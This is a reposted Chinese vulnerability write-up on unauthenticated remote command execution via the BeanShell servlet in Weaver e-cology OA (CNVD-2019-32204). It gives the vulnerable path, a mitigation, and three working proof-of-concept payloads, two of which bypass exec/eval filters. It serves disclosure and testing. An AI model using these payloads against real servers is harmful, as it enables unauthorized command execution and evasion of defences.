泛微OA 多版本存在命令執行


參考

https://blog.csdn.net/qq_41770175/article/details/102821349

https://www.linktrust.net/oday/471.html

https://www.freebuf.com/vuls/215218.html

 

漏洞描述

泛微e-cology OA系統的J**A Beanshell接口可被未授權訪問,攻擊者調用該Beanshell接口,可構造特定的HTTP請求繞過泛微本身一些安全限制從而達成遠程命令執行

 

CNVD編號

CNVD-2019-32204

影響版本

e-cology <=9.0

 

漏洞修復

屏蔽/weaver/*目錄的訪問

 

漏洞復現

1.漏洞路徑:/weaver/bsh.servlet.BshServlet

 

 2.   

把print(“hello!”)換成exec(“whoami”),就可以測試能否執行系統命令了。

Poc1:bsh.script=\u0065\u0078\u0065\u0063(“whoami”);&bsh.servlet.output=raw

 

 如果有全局過濾器過濾了exec或eval,會有報錯,

可以采用unicode編碼、字符串拼接等方式繞過,見下圖:

Poc2: bsh.script=\u0065\u0078\u0065\u0063(“whoami”);&bsh.servlet.output=raw

-----------------------------

Poc3:

bsh.script=eval%00(“ex”%2b”ec(bsh.httpServletRequest.getParameter(\”command\”))”);&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM